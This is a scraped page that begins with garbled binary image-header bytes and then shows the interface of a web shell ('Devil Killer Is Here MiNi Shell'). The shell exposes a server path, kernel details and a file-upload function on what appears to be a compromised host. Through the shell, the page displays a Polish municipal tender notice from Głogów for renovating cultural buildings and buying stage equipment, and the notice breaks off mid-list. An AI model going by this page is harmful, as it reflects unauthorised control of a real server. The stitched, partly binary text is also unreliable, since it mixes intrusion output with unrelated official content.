JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240712/0040959701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Inwestycje w samorządowe jednostki kultury w Gminie Miejskiej Głogów”<br/>Część I, II i III </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Głogów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647297</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Głogów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@glogow.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.glogow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Inwestycje w samorządowe jednostki kultury w Gminie Miejskiej Głogów”<br/>Część I, II i III </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f79fb8a1-39a2-472b-a176-e61146b9c07d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00409597</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00073965/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Inwestycje w samorządowe jednostki kultury w Gminie Miejskiej Głogów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://glogow-um.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://glogow-um.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) zgłoszenie do postępowania wymaga zalogowania wykonawcy do systemu<br/>https://glogow-um.ezamawiajacy.pl<br/>(przez Biuletyn Informacji Publicznej zakładka „Zamówienia publiczne”, Platforma zakupowa MarketPlanet);<br/>2) wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia<br/>bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika<br/>polecenie „zarejestruj się”;<br/>3) rejestracja konta następuje poprzez kontakt z numerem telefonu podanym w potwierdzeniu lub jeżeli użytkownik nie skontaktuje się telefonicznie konto zostanie aktywowane w ciągu maksymalnie 6 godzin<br/>roboczych. W związku z tym zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej,<br/>4) po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu; komunikacja między zamawiającym a wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem platformy zakupowej; za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania poprzez kafelek „Wiadomości” kierujący do modułu korespondencji;<br/>5)Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez akcję „Zadaj pytanie” (przed przystąpieniem do<br/>postępowania). W celu zadania pytania zamawiającemu, wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane wykonawcy tj. Nazwę i<br/>adres mail, temat oraz treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka wykonawca klika akcję POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;Pytanie wysłane&#34;.<br/>6) Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma<br/>zakupowa Głogów tel. +48 22 2572223 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl;<br/>7) Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>- dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>- dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu,<br/>oddzielny plik z podpisem,<br/>8) Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>- Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>- Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>- Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>- Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>9) Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w<br/>txt,rtf,pdf,xps,odt,ods,odp,doc,xls,ppt,docx,xlsx,pptx,csv,jpg,jpeg,tif,tiff,geotiff,png,svg,wav,mp3,avi,mpg,mpeg,mp4,m4a,mpeg4,ogg,ogv,zip,tar,gz,gzip,7z,html,xhtml,css,xml,xsd,gml,rng,xsl,xslt,tsl,xmlsig,xades,pades,cades,asicznaków pozostałe informacje sa zawarte w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">obowiązkowe informacje zostały zawarte w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">: obowiązkowe informacje zostały zawarte w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.25.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres zadania obejmuje m.in. wykonanie następujących robót: <br/>Robot wewnętrzne<br/>-	Docieplenie stropodachu, <br/>-	Docieplenie elewacji,<br/>-	Wymiana wszystkich okien (piwnica + parter + piętro) z parapetami zewn. + wewn.;<br/>-	Demontaż krat okiennych parter + piętro (w piwnicach ponowny montaż);<br/>-	Wymiana wszystkich drzwi zewnętrznych;<br/>-	Demontaż studni okiennych i montaż doświetlaczy okiennych piwnicznych;<br/>-	Docieplenie ścian piwnicznych do głębokości min. 80 cm poniżej terenu (izolacja bitumiczna ścian + styropian 10cm + siatka z klejem + folia kubełkowa/tynk mozaikowy);<br/>-	Lastryko schodów zewn. całkowicie do skucia, nowe pod i przedstopnice z płyt granitowych płomieniowanych. Policzki schodów po zerwanym lastriko do otynkowania.<br/>-	Malowanie biegów schodowych od dołu wraz z policzkami;<br/>-	Całkowita wymiana balustrad;<br/>-	Demontaż balustrad murowanych z donicami i montaż balustrad stalowych;<br/>-	Nowa nawierzchnia pochylni i podestu elewacji południowej z kostki ułożonej na membranie nieprzepuszczalnej i podsypki cementowo piaskowej (kolor kostki nawiązujący do chodnika - kontynuacja); <br/>-	Oświetlenie zewnętrzne awaryjne, monitoring i alarm;<br/>-	Montaż drabiny włazowej;<br/>-	Rozbiórka terenowej czerpni powietrza;<br/>-	Hydroizolacja zadaszenia wejściowego i malowanie attyki dachu;<br/>-	Remont stalowych słupów pod dachem;<br/>-	Wykonanie dylatacji między schodami zewnętrznymi a ścianą piętra (el. południowa) wraz z zabezpieczeniem przeciw dostawaniu się wód;<br/>-	Montaż wycieraczek zewn. w gniazdach z krat WEMA<br/>Roboty zewnętrzne<br/>-	Wymiana drzwi wewnętrznych (parter i piętro)<br/>-	Nowy biały montaż (piwnica, parter, piętro)<br/>-	Nowe oprawy oświetlenia z żarówkami LED (parter i piętro)<br/>-	Skucie płytek posadzkowych i położenie nowych<br/>-	Skucie płytek ściennych i położenie nowych<br/>-	Przebudowa podestów w sali koncertowej i balustrady;<br/>-	Demontaż schodów na scenę - wykonanie nowych stalowych przy ścianie<br/>-	Demontaż szachtów wentylacyjnych wraz z zaślepieniem otworu w stropie;<br/>-	Malowanie ścian i sufitów pomieszczeń (parter i piętro) <br/>-	Wymiana starej instalacji rozprowadzającej c.o. tylko w piwnicy pod sufitem + izolacja rur<br/>-	Wymiana starej instalacji rozprowadzającej c.w.u. i z.w.u. tylko w piwnicy pod sufitem i izolacja rur<br/>-	Wymiana docieplenia rury z ciepłociągu (piwnica) <br/>-	Wymiana całych pionów wewnętrznych kd odprowadzających wodę z dachu<br/>-	Wymiana grzejników żeberkowych / faviera na nowe dwupłytowe (piwnica + parter + piętro)<br/>-	Wykonanie kompleksowej nowej instalacji elektrycznej w sali koncertowej wraz<br/>z doprowadzeniem kabla rozdzielni głównej do szafki bezpiecznikowej na scenie - nowy projekt instalacji wraz z schematem wraz z zwiększeniem mocy przyłączeniowej<br/>-	Wymiana hydrantów wewnętrznych (piwnica + parter + piętro)<br/>-	Montaż oświetlenia awaryjnego, ewakuacyjnego (piwnica, parter, piętro)<br/>-	Nagłośnienie sceniczne wiszące z mikserem, mikrofonami, okablowaniem<br/>-	Oświetlenie sceniczne, dwa mosty oświetleniowe na wciągarkach elektrycznych<br/>-	Wymiana alarmu i montaż kamer przemysłowych ok. 10 szt. kamer wewn. - 5 zewn.<br/>-	Montaż ekranów akustycznych na ścianie sali koncertowej <br/>-	Zakup platformy dla niepełnosprawnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">420 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">27.	Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8<br/>do wysokości po 50 % wartości zamówienia podstawowego dla części I i części II oraz 25% dla części III. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w dokumentacji i/lub ujętych w wykazie dostaw.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres zadania obejmuje m.in. wykonanie następujących robót:<br/><br/>- przystosowanie obiektu dla potrzeb osób niepełnosprawnych (winda osobowa, pochylnia dla niepełnosprawnych, drzwi automatyczne, wyposażenie każdej kondygnacji w najazdy teleskopowe),<br/>- dostosowanie budynku do przepisów przeciw pożarowych (hydranty, udrożnienie komunikacji, oświetlenie awaryjne, ewakuacyjne w wieży),<br/>- zapewnienie bezpieczeństwa użytkowania (wzmocnienie pęknięć, naprawa odpadających tynków, maszt teleskopowy na wieży),<br/>- dostosowanie budynku do potrzeb wystawienniczych (dostosowanie piwnicy na cele wystawiennicze, istniejące sale wyposażone w elementy umożliwiające ekspozycje wystaw),<br/>- kompleksowy remont sal wystawowych: piwnica - skucie tynków, osuszenie, iniekcja; parter, I piętro, II piętro, poddasze (odświeżenie i ewentualna naprawa ścian, sufitów, wymiana instalacji elektrycznej, oświetlenie na potrzeby wystawiennicze, instalacja teleinformatyczna, parkiety – renowacja, montaż systemów zawieszeń). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">420 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">27.	Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8<br/>do wysokości po 50 % wartości zamówienia podstawowego dla części I i części II oraz 25% dla części III. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w dokumentacji i/lub ujętych w wykazie dostaw.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa nw. wyposażenia do Miejskiego Ośrodka Kultury mieszczącego się przy pl. Konstytucji 3 Maja w Głogowie w ramach zadania pn. „Inwestycje <br/>w samorządowe jednostki kultury w Gminie Miejskiej Głogów” <br/><br/>Zestaw głośnikowy szerokopasmowy do budowy matryc liniowych – po 5 szt. w gronie, w sumie 10 sztuk<br/>Zestaw głośnikowy niskotonowy przystosowany do budowy liniowych – 4 sztuki<br/>Rama montażowa służąca do zawieszania lub ustawiania na podłożu zestawów głośnikowych przystosowanych do budowy matryc liniowych – 2 sztuki<br/>Kabel symetryczny Audio ze złączami XLR męski/XLR żeński do realizacji połączeń sygnałowych pomiędzy zestawami głośnikowymi szerokopasmowymi przystosowanymi do budowy matryc liniowych dł. 0,5 m – 6 szt.<br/>Kabel symetryczny Audio ze złączami XLR męski/XLR żeński do realizacji połączeń sygnałowych pomiędzy zestawami głośnikowymi szerokopasmowymi i sub-niskotonowymi przystosowanymi do budowy matryc liniowych, dł. 1m – 4 sztuki<br/>Przewód hybrydowy sygnał/zasilanie o długości 25m do zastosowań scenicznych – 4 sztuki<br/>Przewód zasilający o długości 0,5m do zastosowań scenicznych – 6 sztuk<br/>Przewód zasilający o długości 1m do zastosowań scenicznych – 4 sztuki<br/><br/>SYSTEM OŚWIETLENIA SCENICZNEGO <br/>1. System kratownic<br/>1.1. kratownica o długości 2m – 6 sztuk	<br/>1..2 kratownica o długości 1,5m – 6 sztuk<br/>1.3. kratownica o długości 1m – 6 sztuk<br/>1.4. sworzeń do kratownicy, kompatybilny z kratownicami powyżej 50 sztuk<br/>1.5. pin stożkowy do kratownicy, kompatybilny z kratownicami powyżej 60 sztuk<br/>1.6. zawleczka do pinów, kompatybilna z kratownicami powyżej 100 sztuk<br/>1.7. skrzynia transportowa z wysokojakościowymi wkładkami na akcesoria do kratownic<br/>powinna pomieścić 50 sztuk sworznia, 60 sztuk pinów, oraz 100 sztuk zawleczek	<br/>1.8. podstawa aluminiowa kompatybilna z systemem powyżej, o wymiarach 80 x 80 cm wraz z zestawem złączy w komplecie 8 sztuk	<br/>1.9. hak zaciskowy do rury 50mm-50 sztuk <br/>1.10. rura aluminiowa 2m długości, średnica 50mm 8 sztuk<br/>1.11. łącznik obrotowy do rur o średnicy 50mm - 12 sztuk<br/>1.12. winda do kratownic 2 szt<br/>Winda do konstrukcji aluminiowych do profesjonalnych zastosowań mobilnych i na scenę.<br/>1.13 adapter do wind, do postawienia kratownicy na windzie.<br/><br/>2. PRĄDOWE, ELEKTRYCZNE<br/>2.1. rozdzielnica Flight Case 63A na kołach 18 x 230V	<br/>2.2. rozdzielnica Flight Case 32A na kołach<br/>2.3. split Power 32A rozdzielnica elektryczna przenośna, CEE / Schuko – 6 sztuk<br/>2.4. przedłużacz 10 m / 5 x 10 mm2, 3 x 63A 380 V - 2 szt<br/>2.5. przedłużacz 10 m, 32 A 415 V, 5 x 6,0 mm2 – 5 sztuk<br/>2.6. przedłużacz 230V, 16A, 5m, 6 gniazd - 20 sztuk<br/>2.7. przedłużacz 230V, 16A, 10m, 6 gniazd - 20 sztuk<br/>2.8 przedłużacz 230V, 16A, 3m, minimum 4 gniazda - 20 sztuk<br/>2.9. skrzynia transportowa na wszystkie kable prądowe, <br/>	<br/>3. Kable DMX<br/>3.1. kable o specyfikacji powyżej o długości 20m - 5 sztuk<br/>3.2. kable o specyfikacji powyżej o długości 10m - 30sztuk<br/>3.3 kable o specyfikacji powyżej o długości 5m - 40 sztuk<br/>3.4. kable o specyfikacji powyżej o długości 3m - 40 sztuk<br/>3.5 skrzynia transportowa na wszystkie kable DMX <br/>	<br/>4. Konsola oświetleniowa oraz dodatki<br/>4.1. GrandMA 2port node onPC – rozszerzenie do konsoli oświetleniowej z dodatkowymi parametrami, z wersją oprogramowania do sterowania przez komputer, onPC – 1 sztuka<br/>4.2. splitter DMX - 3 sztuki<br/>4.3. bramka ARTNET – 2 sztuki<br/>Interfejs Art-Net do wyjścia 8 wszechświatów na XLR<br/>4.4. Profesjonalny kabel Cat5e na bębnie, ze złączem RJ45. Długość: 50 m. - 3 sztuki	